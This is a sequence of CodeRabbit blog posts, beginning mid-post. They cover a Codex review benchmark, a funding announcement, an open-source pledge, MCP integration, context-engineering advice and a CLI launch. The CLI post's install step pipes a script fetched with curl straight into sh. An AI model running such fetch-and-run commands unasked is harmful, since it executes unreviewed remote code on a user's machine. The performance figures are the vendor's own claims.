Net: faster reviews, earlier feedback, better flow for the human in the loop. ## **What a CodeRabbit user should expect** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/599a7580793d7f8792ea58e0eea3f29c46bf53b7e35743c0508df1070adcff54_d5bc57b4b6.png) Now that Codex is implemented, how will that change your AI code reviews? 1. **The same raw bug finding power** * On the refreshed hard 25, Codex passed 64% at the EP level vs. 60% for GPT‑5 (our [previous set of PRs](https://www.coderabbit.ai/blog/benchmarking-gpt-5-why-its-a-generational-leap-in-reasoning) had GPT-5 passing 77.3%). No loss of the important wins GPT-5 helped with. 2. **Fewer but stronger comments** * About 32% fewer total comments than GPT‑5, with about 35% higher SNR (per comment precision). More patches, less prose. 3. **Severity tags to focus your review** * Critical and Major issues float to the top with our new severity tags. Refactors are gated. Nitpicks are opt-in. You will spend less time scanning comments and more time fixing. 4. **A faster feedback loop** * Codex’s leaner reasoning plus pipeline improvements bring time to first helpful comment down. You will feel it. ## **Quantitative appendix (for the curious)** We know you love data! Here’s some other stats we found interesting: * **Per comment precision (SNR) uplift:** Codex 46.3% vs. GPT‑5 34.2% — about +35% relative. * **Comment volume delta:** Codex 54 vs. GPT‑5 79 — 32% fewer comments, with EP passes essentially unchanged (16 vs. 15). * **Style:** Codex includes diffs in 94% of comments and uses hedging far less than Claude and GPT‑5 on this set. * **Acceptance (real world):** During GPT‑5 rollout, acceptance dropped significantly. With Codex plus changes, it rose by about 20–25% relative and returned to prior levels while still delivering more accepted comments than pre GPT‑5. 
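For readers who want to check the relative figures above, the arithmetic is short enough to reproduce. The numbers below are the ones quoted in this post; the helper name `relative_change` is only for illustration.

```python
def relative_change(new: float, old: float) -> float:
    """Relative change from old to new, as a fraction of old."""
    return (new - old) / old


# Per comment precision (SNR), in percent, as reported above.
codex_precision, gpt5_precision = 46.3, 34.2
precision_uplift = relative_change(codex_precision, gpt5_precision)

# Total comments on the hard 25 set.
codex_comments, gpt5_comments = 54, 79
volume_change = relative_change(codex_comments, gpt5_comments)

# EP-level pass rate: passed PRs out of 25.
total_prs = 25
codex_ep_rate = 16 / total_prs
gpt5_ep_rate = 15 / total_prs

print(f"precision uplift: {precision_uplift:+.1%}")  # +35.4%
print(f"comment volume:   {volume_change:+.1%}")     # -31.6%
print(f"Codex EP pass:    {codex_ep_rate:.0%}")      # 64%
print(f"GPT-5 EP pass:    {gpt5_ep_rate:.0%}")       # 60%
```

The +35% figure is a relative uplift (12.1 percentage points on a base of 34.2%), not a 35-point jump in precision.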
## **Where Codex still needs work (and what we are doing)** These improvements are great but that doesn’t mean that there aren’t still issues with Codex. Here are some that we are actively working on: * **Coverage gaps.** When a model leaves no comment on a PR, that is a hard fail for that EP. We are widening Codex’s search heuristics so it is less likely to miss entire classes of issues. * **Refactor over eagerness (tuned, not solved).** The “essential only” gate curbs refactor noise, but we will keep tightening the threshold, especially on large diffs where a high number of comments would be overwhelming. * **User driven prioritization.** We cannot change GitHub’s in-line ordering, but we annotate every comment with severity so you can triage from the top down without hunting. ## **Codex GPT-5: All of the great bug catching ability, fewer downsides** Our north star is simple: **catch the bugs that matter, quickly, without making you sift through noise**. Codex helps us do that. It keeps the bite of GPT‑5’s reasoning while restoring SNR and shaving latency down significantly. We will keep measuring, improving, and shipping a better product every release.

We raised $60 million last week… so we made a funny video

Aravind Putrevu — Tue, 23 Sep 2025 00:00:00 GMT

Last week, we announced CodeRabbit’s **$60 million Series B**. To celebrate, we did what any responsible, developer-focused software company would do: we made a funny video. Not with *all* the money, to be clear. But we did decide to celebrate with something fun, absurd, and painfully relatable for any dev team trying to keep up with the flood of AI-generated PRs. ## **Introducing… “When AI coding agents backfire: A short film”** %[https://youtu.be/glfB3KLQR7E?feature=shared] It’s a short mockumentary-meets-sitcom about what really happens when “AI velocity” turns into a PR review backlog. * One reviewer. * Dozens of notifications. * 84 open PRs. * And one overly eager coworker named Brad who just wants feedback. ## **The cast** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/3535b9bef51f5780d56cda4892b3045a1e3fcaf34ddef8adc8a6886dfee0596f_6abc6f5a35.png) To bring it to life, we pulled in beloved developer educator (and influencer) [**Aaron Francis**](https://x.com/@aarondfrancis) to star as our beleaguered reviewer. He’s the guy who just wanted to ship features faster and now can’t go to the kitchen (or even leave his house at 8 a.m.) without Brad asking about his PR. And speaking of Brad: the inimitable [**Austin von Johnson**](https://www.instagram.com/4ustinvon/?hl=en) plays him to perfection. Brad’s a developer who can crank out AI-generated PRs at lightning speed but cannot, under any circumstances, *wait patiently* for a review. His lurking, his post-its, his hoodie PR ambushes… let’s just say he was perfectly committed to the bit. 
## **The very real problem behind the joke** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/404fdfebb47225ce911bd175298de3c83ca77b756679fc58fe004d5311e2a100_f64fbc7d2f.png) The short film is funny, but the problem it highlights is real: * **AI coding tools crank out code faster than teams can review it** * **Review backlogs balloon** while productivity drops * **Senior engineers get buried** in endless PRs * Review quality is uneven, risk goes up, and you have to deal with more issues * And suddenly, the promise of velocity feels more like a nightmare. ## **Here’s what we’re doing about it** CodeRabbit exists to **clear the backlog**, not add to it. Our AI code reviews pull in dozens of points of context (requirements, tests, CI, past diffs, ownership) to catch bugs you’d miss, reduce reviewer fatigue, and move PRs through faster—without turning teammates into… Brad. Ship faster, review smarter, and keep your sanity. Also, avoid creating a… Brad. 👉 [Watch **“When AI coding agents backfire: a short film”** right here.](https://youtu.be/glfB3KLQR7E?feature=shared) And if you’ve ever been chased around the office about a PR, please, send it to your team’s Brad.

CodeRabbit commits $1 million to open source

Aravind Putrevu — Thu, 18 Sep 2025 00:00:00 GMT

Open source is the foundation of modern software development. From package managers and developer tools to frameworks and infrastructure, open source projects power nearly every piece of software we use today – including CodeRabbit itself. These projects are built and maintained by communities of developers who dedicate countless hours to keeping them alive, secure, and evolving. Today, we’re proud to announce a **$1 million USD commitment to open source software sponsorships**. This commitment comes on the heels of our **$60 million Series B funding round** and it reflects both our gratitude for what open source makes possible and our belief in the importance of investing in its future. ## **Why open source needs support now more than ever** Generative AI is transforming software development, but it’s also putting new pressures on open source maintainers. Alongside the surge of high-quality contributions, there has been a sharp rise in **AI-generated PR spam**: repetitive, low-quality, and sometimes insecure code submissions that overwhelm project maintainers. We’ve heard firsthand from maintainers about how draining this flood of noise can be. At CodeRabbit, we’ve built tools that **filter out spam, elevate code quality, and reduce maintainer workload** by blending AI-driven code review with human oversight. We’ve made our AI code review tool free for use on all open source projects (more about that here). But tools alone aren’t enough—sustainable open source requires financial support, recognition, and stronger bridges between communities. 
## **From $200K to $1M: Deepening our commitment** Earlier this year, we announced a [**$200,000 pledge to open source**](https://2025.allthingsopen.org/pledging-support-for-open-source), supporting projects like: * **pnpm**: A disk-space–efficient package manager * **Biome (biomejs)**: A next-generation linter and formatter for JavaScript and TypeScript * **AST Grep (Herrington Darkholme)**: Structural code search for smarter code analysis * **iTerm2 (George Nachman)**: A terminal emulator that redefined developer workflow * **Markdown Lint (David Anson)**: Ensuring docs stay clear and consistent That pledge was only the beginning. With our new Series B funding, we’re scaling our support to **$1 million**, ensuring that more projects and maintainers across the ecosystem receive the recognition and resources they deserve. [**Apply for sponsorship here.**](https://coderabbit.link/oss-progam-submission-form) ## **CodeRabbit & OSS: Building bridges across the OSS ecosystem** Sponsorship is only part of the story. Many of the challenges open source faces—sustainability, security, and developer burnout—aren’t isolated to a single project. They stretch across communities and ecosystems. That’s why CodeRabbit is also working to **connect maintainers, foster collaboration, and share solutions across projects**. Whether through joint sponsorships, shared initiatives, or community-driven tooling conversations, we aim to strengthen the ecosystem as a whole rather than supporting it in silos. If you’re a maintainer or contributor who wants to join these conversations, we’d love to hear from you. Join our Discord to connect with the CodeRabbit team and other open source leaders. ## **Free CodeRabbit access for open source projects** Finally, a reminder: **CodeRabbit is free for open source**. Every maintainer, contributor, and community can use our platform to cut through PR noise, automate code quality checks, and free up more time for meaningful contributions. 
***Learn more and*** [***apply for funding here.***](https://coderabbit.link/oss-progam-submission-form)

CodeRabbit’s MCP integration = Code reviews that see the whole picture

Edgar Cerecerez — Wed, 17 Sep 2025 00:00:00 GMT

Every dev team knows the pain of code reviews performed in isolation. An AI tool (or even a teammate) can comment on syntax, style, and patterns, but without business requirements, deployment dependencies, or organizational knowledge, it’s just guessing at half the story. CodeRabbit currently has a number of native integrations including Linear, Jira, and CircleCI. We have seen the value that context from those tools provides to code reviews. That’s why we’re excited to announce the GA of **CodeRabbit’s integration with MCP servers**. This will allow you to bring even more context into your reviews. With this launch, we become the first AI code review platform that orchestrates context from across your entire development ecosystem, from business requirements in Confluence to system dependencies in your CI/CD pipeline to data from any internal MCP servers, all to provide code reviews that actually understand what your code is trying to accomplish. **Start your 14-day trial →** *Get context-aware reviews that reference your actual team standards in ~10 minutes.* ## **Why MCP for AI code reviews?** Development teams operate across dozens of tools: * Requirements live in Linear * Design specifications exist in Figma * Architectural decisions get documented in Confluence * Security standards evolve in internal wikis after each audit AI code reviewers start with basic context: your codebase, some coding guidelines, maybe a few integrations. They analyze syntax, check patterns, and suggest improvements. But they miss the context that determines whether code actually works for your team. As an MCP client, CodeRabbit acts as a compiler for organizational context. It takes high-level inputs (your wikis, tickets, deployment patterns) and compiles them down into precise, actionable code review insights.
Instead of bloated integrations or brittle hacks, MCP lets clients like CodeRabbit pull in just the right data from your MCP servers, from sources like your Linear tickets, Confluence docs, Datadog metrics, or Slack discussions. ## What it looks like in practice… CodeRabbit searches connected MCP servers before starting a review. For example, database schema changes might get checked against data architecture documents. API endpoint implementations might get verified against service design patterns documented in internal wikis. **Example: CodeRabbit verifies code consistency** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/2d107fbb8fc56d5a027bdf750f5902341f7ac2abe06eed3d7ad369a77805daee_f12aac823d.png) ## Bring in the context that matters to you… from any tool ![](https://victorious-bubble-f69a016683.media.strapiapp.com/8c5f8bafae2d598ecb5310772ba14b45a9b60b1cc3ffa42e137ee35fad1cba9e_6eddc08aa1.png) Traditional code review tools require specific integrations. CodeRabbit's MCP integration works with any system that has an MCP server: your proprietary internal tools, boutique SaaS platforms, custom documentation systems. If there's an MCP server, CodeRabbit can connect. With CodeRabbit as an MCP client, your reviews gain depth from three different types of context. ### **Technical context.** * Think dependencies, performance data, static analysis, and test coverage. * **Native integrations:** GitHub Actions, GitLab CI, Bitbucket Pipelines * **MCP Servers:** Datadog, New Relic, SonarQube, Snyk, Grafana * Example Review Comment: ![](https://victorious-bubble-f69a016683.media.strapiapp.com/7adc999bc75ec754135830427317a4a7e16c0dab25bb4010f188581d66e333aa_4f1b4d0ea7.png) ### **Business context.** * This includes things like requirements, user stories, and acceptance criteria.
* **Native integrations:** Linear, Jira, GitHub Issues, GitLab Issues * **MCP Servers:** Confluence, Notion * Example Review Comment: ![](https://victorious-bubble-f69a016683.media.strapiapp.com/82bf747262be78dd2a827283a621ea4eabe63a1ca1681acd77947f7f225eb64e_c2a10749dc.png) ### **Organizational context.** * We also pull in things like prior decisions, conventions, meeting notes, and institutional knowledge. * **Native integrations:** PR history, Team conventions * **MCP Servers:** Slack, Microsoft Teams, Stack Overflow for Teams, PagerDuty * Example Review Comment: ![](https://victorious-bubble-f69a016683.media.strapiapp.com/ad1c1707c7ced1bf966a0f582bf99244a58cbc76a91290c5fb6f9786d61b530e_5dc604550d.png) ## **Getting started with MCP integration** Setting up CodeRabbit's MCP client requires minimal configuration. Most development teams can connect their first MCP server in under 10 minutes. **Popular development tools with MCP server support**: * **Linear** (native MCP support, 5 minutes) * **Notion** (MCP server available, 10 minutes) * **Confluence** (community MCP server, 15 minutes) * **Figma** (MCP plugin available, 10 minutes) Define which code changes should search which development systems. Database changes check architecture documentation. Authentication changes check security documentation. Adding an MCP server is easy: 1. In the CodeRabbit dashboard, head over to integrations > and toggle to the MCP Servers tab if needed ![](https://victorious-bubble-f69a016683.media.strapiapp.com/a1316478eb68c7d3d64f1f4423305ccc40407e67bc4634aad25ce633e331ff06_707e8c2ec5.png) 2. You can click on one of the pre-configured MCP server options or the New MCP Server button to add other MCP servers. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/dbbb366a1f958f18a6e27c591ce8060200f1dc8ee0b200d124b60a6c4a118ae9_fc521eb479.png) 3. For MCP servers not on the list, enter the relevant credentials. 4. 
Note the usage guidance, which serves as context for how the MCP information should be used.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/7eb39133a5e122b798242e57c0562cecac1d5770df66d1a719192b73ee60502f_2f32910e23.png)

5. Once connected, you can see the available calls and hover over them to see more details.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/1edda093cd5cb5c55f76e2c36ca82c725e533c5271e082c150307723b98297aa_8fe9bc43ee.png)

6. You can also click on each call to enable/disable access.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/4ec027c44cf6da4988d1101c09561784ace2be4584aaef18883be29dcb87ea0b_85cd463156.png)

> Note: All MCP Server queries are ephemeral. CodeRabbit processes them in real-time with zero data retention.

## **A review platform that brings in all your context**

CodeRabbit works out of the box with 50+ integrations. With MCP, you can extend it to your custom servers and internal tools. Start with the systems you already use (Linear, Confluence, Datadog, Slack) and add more as you go.

### **Next steps:**

1. [**Start a 14-day trial**](https://app.coderabbit.ai/login???free-trial)
2. [**View MCP server directory**](https://app.coderabbit.ai/integrations)
3. [**See the MCP docs**](https://docs.coderabbit.ai/context-enrichment/mcp-server-integrations)
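To make the idea from the setup section concrete ("define which code changes should search which development systems"), here is a minimal sketch of such a routing table. It is not CodeRabbit's configuration format: the glob patterns, the server labels, and the `servers_for_change` helper are all hypothetical and only illustrate how a change to migrations could map to architecture docs while auth changes map to security docs.

```python
from fnmatch import fnmatch

# Hypothetical routing table: glob pattern for changed files -> MCP servers to query.
# Patterns and server labels are illustrative, not real CodeRabbit settings.
ROUTING_RULES = [
    ("db/migrations/*", ["confluence:data-architecture"]),
    ("src/auth/*", ["confluence:security-docs"]),
    ("*", ["linear"]),  # fallback: every change is checked against the ticket tracker
]


def servers_for_change(changed_files):
    """Return the MCP servers to search, in first-seen order, for a list of changed paths."""
    selected = []
    for path in changed_files:
        for pattern, servers in ROUTING_RULES:
            if fnmatch(path, pattern):
                for server in servers:
                    if server not in selected:
                        selected.append(server)
    return selected
```

Keeping the rules in one small table makes it easy to see, and to review, which systems a given kind of change will consult.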

Handling ballooning context in the MCP era: Context engineering on steroids

Tommy Elizaga — Wed, 17 Sep 2025 00:00:00 GMT

Once upon a time, getting context into an LLM meant stringing together hacks, prayers, vector strategies, and overly complex RAG pipelines. Then came the **Model Context Protocol (MCP),** a clean, modular way to serve external data to models in production. It quickly became the protocol of choice for anyone building agentic systems that are trying to actually *do* things. Every tech company is now launching MCP functionalities – and for good reason. MCP separates context logic from application logic, improves reliability, and helps tame the chaos of prompt construction in complex workflows. We’ve been deep in the context engineering space for a while, and as we launch our own MCP client, we’re genuinely excited by how it lets us inject richer context into our code reviews. But let’s be honest: with great context comes great risk. Because here’s the dirty secret of the MCP era: **most of us are now drowning in the context we used to beg for**. More logs, more traces, more diffs, more "relevant" files and way less clarity about what the model actually needs. What starts as helpful input quickly turns into token bloat, noise, and degradation in model performance. Think hallucinations with citations, latency spikes, or reviews that read like they were written by an over-caffeinated intern who rambles. Good context engineering isn’t about cramming in *everything*, it’s also about knowing what to leave out. And in the aftermath of MCP, that balance is harder (and more important) than ever. In this article, we’ll break down the **ballooning context problem**, what happens when well-intentioned context goes rogue, and how we’re tackling it head-on. If you’re shipping LLM-based features with MCP and want to avoid accidentally building a prompt-shaped black hole, this blog is for you. 
### **The “Ballooning Context Problem” with MCP clients & servers** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/6ed2fa6b0c7de4c2c195d9619db5cb3c900d272937517f2740357e3687f1f917_0f05c0c16a.png) MCP servers and clients make it easy to hand models a firehose of information: logs, traces, diffs, configs, tickets, and sometimes even that dusty corner of the repo nobody remembers owning. It’s all right there at the model’s fingertips. But here’s the question: is more context always better? Definitely not! Too much context is like cramming for an exam by reading the entire library. You end up with noise, not knowledge. And when context goes unchecked, three problems show up fast: * **Token bloat.** LLMs don’t have infinite stomachs. Input windows are expensive and finite, and stuffing them full of “just in case” details means higher costs, slower throughput, and wasted budget on irrelevant text. * **Relevance decay.** More information doesn’t mean better outputs. In fact, it often means worse. Irrelevant or redundant snippets dilute the signal, and the model starts chasing tangents instead of insights. * **Latency.** Every extra log, diff, or stack trace has to be fetched, processed, and shoved into the prompt. Context building becomes the bottleneck, dragging review speed down to a crawl. In short, ballooning context turns the elegance of MCP into a liability. Without deliberate context engineering, the very thing meant to sharpen outputs can just as easily smother them. ## When context hurts ![](https://victorious-bubble-f69a016683.media.strapiapp.com/1ae392beedab9bb254ebeddd0dec021bba79702c217de5a8578c01e12a00ccdf_bffbbd118e.png) In practice, we see three common pathologies: * **Context confusion.** This happens when the model latches onto irrelevant detail and treats it as signal. Imagine a pull request that updates authentication logic but the context dump also includes unrelated test fixtures. 
The model might start reviewing the fixtures instead, producing comments that feel informed but have nothing to do with the actual change. * **Context clash.** Not all context agrees with itself. Suppose a code review includes both the latest schema migration and an outdated docstring that contradicts it. The model now has to “choose” which source to trust. Often, it hedges, producing muddled reviews that cover every angle without real confidence: the LLM equivalent of a reviewer who can’t commit. * **Context poisoning.** The most insidious case is when bad information makes it into the context. A hallucinated “related file” or a mis-indexed snippet gets injected, and suddenly the model is citing non-existent code. In a review, that looks like a comment about a bug in a file that doesn’t exist, confusing developers, wasting time, and eroding trust. And it’s not just code reviews. The same pitfalls show up anywhere context gets overstuffed: customer support bots pulling in irrelevant tickets, research assistants distracted by tangential papers, or security agents treating noisy logs as hard evidence. In each case, the wrong context is worse than no context at all. ## Key patterns to combat context overload with MCP servers ![](https://victorious-bubble-f69a016683.media.strapiapp.com/2bbed472e92f41bc76636475e6887b3713952af987a91772bc4a0393cf900b79_d92b95cbd9.png) If the problem of the MCP era is ballooning context, the solution isn’t to stop piping in information — it’s to curate, compress, and serve it with intent. MCP context should be treated as raw material that goes through a well-designed data transformation process before it ever reaches the model. For our own MCP client for code reviews, we’ve leaned on a set of patterns that keep context high-signal and low-noise. * **Context deduplication and differencing** Redundant inputs are the fastest way to waste tokens. 
Identical stack traces, repeated log lines, or unchanged sections of a diff don’t need to appear ten times. Our client identifies duplicates, collapses them, and highlights only what’s new. The same principle applies in other domains: collapse duplicate customer tickets, compress recurring traces, and reduce context to delta rather than bulk. * **Context summarization pipelines** Sometimes raw MCP output is still too big. Here, LLMs themselves can help by summarizing retrieved context into something smaller. The tradeoff is compression vs. fidelity: a summary might miss nuance, but the alternative is a model drowning in detail. In practice, we use hybrid designs: raw diffs for high-priority files, summaries for less-critical context. * **Context prioritization and truncation** Even after pruning and summarizing, you still need to decide what goes first, what can be deferred, and what gets dropped if there isn’t room. Setting a token budget per MCP query is critical, or else prompts will balloon unpredictably. We’ve experimented with truncation-aware designs; sometimes front-loading summaries for quick orientation, other times end-loading detail for deep dives. The “right” design depends on the workflow and the model’s feedback loop. * **Context quarantining** Not every piece of context belongs in the first prompt. Subtasks should carry their own dedicated context threads, so the model sees exactly what it needs when it needs it. For example, in our MCP client, test failures live in a dedicated review sub-thread rather than clogging the main review context. This approach reduces confusion and helps preserve clarity across long interactions. * **Iteration and learning** Context engineering isn’t static. We use model feedback and human-in-the-loop corrections to tune priorities over time. Observability is key: logging actual prompt inputs, broken down per module, lets us see what’s getting through and what’s wasted. 
Tooling like MCP dashboards or token heatmaps can highlight where budgets are blown or irrelevant inputs are sneaking in. ## **Anti-patterns to avoid with MCP servers & clients** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/cbbe88cd19523c19edb2413b1ff69d527e8f0ef9576cfa772baa146acc7f1023_c84cf773af.png) The MCP era makes context retrieval easy. Maybe *too* easy. A couple of common anti-patterns are worth calling out: * **Blind vector stuffing** Vector databases are great at surfacing “relevant” chunks of information, but treating them as an oracle is a recipe for trouble. Stuffing in every vaguely related snippet means you get reviews full of tangents: comments about files that weren’t touched, or nitpicks based on stale code. Context irrelevance doesn’t just waste tokens — it actively drags down model performance by pulling attention away from the real task. * **“Just give it everything”** The brute-force approach: dump every log, diff, and docstring into the context window and pray. This guarantees high costs, long latencies, and unpredictable results. The model can’t tell which parts are critical and which are fluff, so you end up with bloated reviews that read like they were written by an overeager intern trying to cover every angle. Worse, when contradictions sneak in, the model hedges or hallucinates to reconcile them. In short: more context isn’t always better. Without filtering, prioritization, and careful design, “everything” quickly turns into noise that makes the system slower, dumber, and more expensive. ## The approach we took with our MCP client In the MCP era, context is king. But let’s be honest: sometimes it’s a king that’s had one too many and can’t tell up from down. The challenge isn’t getting context anymore; it’s taming it. Great context engineering requires careful transformation pipelines, ruthless prioritization, and the humility to keep iterating. Done poorly, you get token bloat, latency, and reviews that sound confused. 
Done well, you get sharper outputs that scale with your workflow. We’ve seen this firsthand in our own MCP client for code reviews. When testing, we initially passed full logs and entire file sets straight through. The result? Expensive reviews that rambled more than they helped. Once we introduced deduplication, summarization, and task-specific quarantining, review quality jumped. Instead of commenting on everything, the model zeroed in on real cross-file risks, while token use and latency both dropped. That’s the payoff of good context engineering: reviews that feel informed, not bloated. And that’s what we’re building toward with our MCP client. ***👉 Ready to see context done right? Start your*** [***14-day trial***](https://app.coderabbit.ai/login???free-trial) ***of our AI code reviews.***
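As a rough illustration of two of the patterns described in this post (deduplication, then prioritization under a token budget), here is a minimal sketch. It is not the code behind our MCP client: `ContextItem`, `estimate_tokens`, and `build_context` are hypothetical names, and the four-characters-per-token estimate is a crude assumption that stands in for a real tokenizer.

```python
from dataclasses import dataclass


@dataclass
class ContextItem:
    source: str    # illustrative label such as "logs", "diff", or "wiki"
    text: str
    priority: int  # lower number = more important


def estimate_tokens(text: str) -> int:
    """Crude estimate (about 4 characters per token); a real client would use the model's tokenizer."""
    return max(1, len(text) // 4)


def build_context(items, token_budget):
    """Drop duplicate items, then keep the highest-priority items that fit in the budget."""
    seen = set()
    unique = []
    for item in items:
        key = " ".join(item.text.split())  # normalize whitespace so repeated lines collapse
        if key not in seen:
            seen.add(key)
            unique.append(item)

    selected, used = [], 0
    for item in sorted(unique, key=lambda i: i.priority):
        cost = estimate_tokens(item.text)
        if used + cost > token_budget:
            continue  # does not fit; a smaller, lower-priority item may still fit
        selected.append(item)
        used += cost
    return selected, used
```

Returning the number of tokens used alongside the selection makes it straightforward to log per-query budgets, which is the kind of observability the "Iteration and learning" pattern relies on.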

CodeRabbit CLI - Free AI code reviews in your CLI

Edgar Cerecerez — Tue, 16 Sep 2025 00:00:00 GMT

CodeRabbit started with AI-powered code reviews in pull requests. In May, we brought that same intelligence to [VS Code, Cursor, and Windsurf](https://www.coderabbit.ai/blog/ai-code-reviews-vscode-cursor-windsurf). Now, we're extending the AI code reviews developers love into the command line with CodeRabbit CLI. In case you’re wondering, that makes us the most comprehensive AI code review tool available. We work everywhere you work. *CodeRabbit CLI* helps devs perform self-reviews of code directly in their terminal. By providing automated, intelligent code analysis capabilities, it empowers developers to catch issues early, maintain consistent code standards, and make coding autonomous through seamless integration with AI coding agents in the CLI. ## **Vibe checking your code – now in CLI** %[https://youtu.be/IqBKf4u5MtA] CodeRabbit CLI delivers the same comprehensive analysis that makes our PR and IDE reviews effective at catching bugs early. CodeRabbit CLI is free to use with rate limits but with a Pro plan you can enjoy much higher limits and additional features, including: * **Context-aware analysis**: Leverages your Git integration to synthesize insights from 40+ sources including static analysis tools, security scanners, and our codegraph relationship feature for the most comprehensive reviews. * **Pre-commit reviews**: Analyze changes before they leave your machine for multi-layered reviews. * **One-click fixes**: Apply simple fixes instantly or send complex issues to AI agents with full context hand-off. * **Coding guidelines**: Auto-detects agent.md, claude.md, Cursor rules, and other coding agent configuration files. 
## **CodeRabbit CLI: Works everywhere, with everything**

Terminal-native means CodeRabbit CLI works with:

* **Any Terminal App/IDE:** iTerm2, Ghostty, Neovim, LazyVim
* **Any AI Coding CLI agent**: Claude Code, Codex, Cursor, Gemini, OpenCode and more

## **How to use CodeRabbit CLI with AI Coding Agent CLI**

The CodeRabbit CLI opens up new integration possibilities with AI coding agents. Here's how it works with Claude Code:

1. While working on a coding task, you can prompt Claude Code to use CodeRabbit and to fix any issues it finds. This is particularly useful if it’s coding from a PRD or a task list.

```plaintext
Please implement phase 7.3 of the planning doc and then run coderabbit --prompt-only, let it run as long as it needs (run it in the background) and fix any issues.
```

![](https://victorious-bubble-f69a016683.media.strapiapp.com/6b657cafb962e0c9812ea96f5d71ba550c465557996afd1bf85715563295d2ef_1bb2356c5d.png)

2\. Claude Code will carry on the coding task and run `coderabbit --prompt-only` in the background. It may set up a timer interval to check on CodeRabbit. Alternatively, you can prompt Claude to check whether CodeRabbit is complete.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/e68a7c3f44a1170911f8bb1db24d3fba73f4e140b23b11b404f4d9d0d689a40c_1e7e21da00.png)

![CodeRabbit running in the background within Claude Code](https://victorious-bubble-f69a016683.media.strapiapp.com/eb21a580e8e0628ace6d925edcf6d77821827e92ed4b3aa97e343a1b8d2e4085_a68d41df53.png)

3\. Claude Code will then read the output of CodeRabbit, which the `--prompt-only` flag returns as plain text with prompts for AI agents to read. Claude will then create a task list addressing each of the issues surfaced by CodeRabbit.
![](https://victorious-bubble-f69a016683.media.strapiapp.com/725bfbbcaf2f566904fd932c98d42688933e3e0cef13878e63e0941dc0cccdf0_85c2b545bb.png)

![](https://victorious-bubble-f69a016683.media.strapiapp.com/6b4991bb35c42f9bdd56311e414e69d5750a7e087bbb1130353a513898a7efe3_69dd684673.png)

For Claude Code integration and automated workflows, check the [CLI documentation](https://docs.coderabbit.ai/cli) for setup. The CLI has two modes, interactive and plain response, making it easy to integrate into automated workflows or pass results to other tools.

## **Getting started**

CodeRabbit CLI is available now. Install and try your first review:

```bash
# Install CodeRabbit
curl -fsSL https://cli.coderabbit.ai/install.sh | sh

# Run a review in interactive mode
coderabbit
```
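If you want to pass review results to another tool yourself, a thin wrapper is usually enough. The sketch below is only an illustration: it uses the `coderabbit --prompt-only` invocation shown earlier and makes no assumptions about the output format or exit codes beyond "plain text on standard output". The function names and the 30-minute timeout are hypothetical choices, not part of the CLI.

```python
import shutil
import subprocess


def build_review_command(prompt_only: bool = True) -> list[str]:
    """Build the CLI invocation; `--prompt-only` is the plain-text mode described in this post."""
    command = ["coderabbit"]
    if prompt_only:
        command.append("--prompt-only")
    return command


def run_review(repo_dir: str = ".", timeout_seconds: int = 1800) -> str:
    """Run a review inside repo_dir and return whatever the CLI printed to stdout."""
    if shutil.which("coderabbit") is None:
        raise FileNotFoundError("coderabbit CLI not found on PATH; install it first")
    result = subprocess.run(
        build_review_command(),
        cwd=repo_dir,
        capture_output=True,
        text=True,
        timeout=timeout_seconds,  # assumed upper bound; reviews can take a while
        check=False,              # do not assume anything about exit codes
    )
    return result.stdout
```

Calling `run_review(".")` from a script gives you the review text as a string that can be written to a file or handed to an agent as part of its next prompt.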

Raising our $60M Series B: Building the quality gates for AI-powered coding

Harjot Gill — Tue, 16 Sep 2025 00:00:00 GMT

When we started CodeRabbit, the idea was pretty simple: since all developers hate code reviews, why not make them faster and easier? After all, no one enjoys leaving the same comment about variable naming practices or style conventions for the tenth time in a week. That’s where we believed AI could help – it could automate best-practice checks and policy enforcement so that devs didn’t have to do it themselves. But more importantly, it could act as a safety net, catching issues and bugs before they made it into production. With that belief, we set out to [create something new: AI code reviews.](https://www.coderabbit.ai/blog/coderabbit-announces-16m-series-a-funding-led-by-crv) Over time, AI coding tools started to gain broader adoption. Tools like Copilot, Claude Code, and Cursor began spitting out more code than teams could easily review with many developers increasing the number of PRs they shipped by 2x to 3x. This added to the existing code review backlogs many teams had. We quickly realized that the ‘efficiency’ gains being marketed to engineering teams would swiftly turn into code review bottlenecks. And that’s also when we first realized how critical AI code reviews would be to development teams. They would function as a trust and governance layer in agentic software development ensuring quality and security while saving devs time. And, as an added bonus, greatly reducing passive aggressive review comments in the workplace! ## **AI code reviews became essential in 2025** %[https://youtu.be/UHCTKZYOOYU] Over the last two years, we’ve built the most comprehensive and context-rich platform for code reviews, been installed on 2 million repos, reviewed 13 million pull requests, become the most installed AI App on both GitHub and GitLab, and improved the morale of countless dev teams. In 2025, we watched AI code reviews become essential for all teams dealing with the challenges that come with the broad adoption of AI coding agents. 
That shift fueled a year of unprecedented growth, culminating in the **$60 million Series B round** that we announced today. This investment was led by **Scale Venture Partners** with participation by **NVentures (NVIDIA’s venture capital arm)** and support from our long-time investors **CRV, Harmony Partners, Flex Capital, Engineering Capital, and Pelion Venture Partners**. With this new funding, our total capital raised is now $88 million.

## **Why so many teams are adopting AI code reviews**

When every developer on your team is generating code faster, your review queue grows faster than your reviewers can clear it. Senior engineers who used to review 5 to 10 PRs a day are now facing 20 to 30. The math doesn't work. Teams are caught between two bad options: either slow down deployment cycles waiting for thorough reviews, or rush reviews and let quality slip.

This is why AI code review adoption is accelerating. AI reviewers augment the human reviewers, freeing them to focus on architecture decisions, business logic, and the nuanced feedback that requires context AI can't fully grasp yet.

The past year has been a whirlwind. We’ve grown revenue 10x and doubled our team thanks to:

![](https://victorious-bubble-f69a016683.media.strapiapp.com/83b876a29aa62aff658ecd093bc0499499e7894527aca4990f8d99363c143588_19daad5aab.png)

Behind each of those customers are real teams who tell us the same thing: reviews are faster with CodeRabbit, bugs are caught earlier, and release cycles are finally speeding up again. Groupon told us their time from review to production went from 86 hours down to just 39 minutes. Another customer shared that they cut the time they spend on code reviews by 70%.

## How CodeRabbit works

CodeRabbit works because it fights AI fire with AI fire. Our platform brings in dozens of points of context to deliver the most context-aware reviews to:

* Catch correctness and security issues before they hit production.
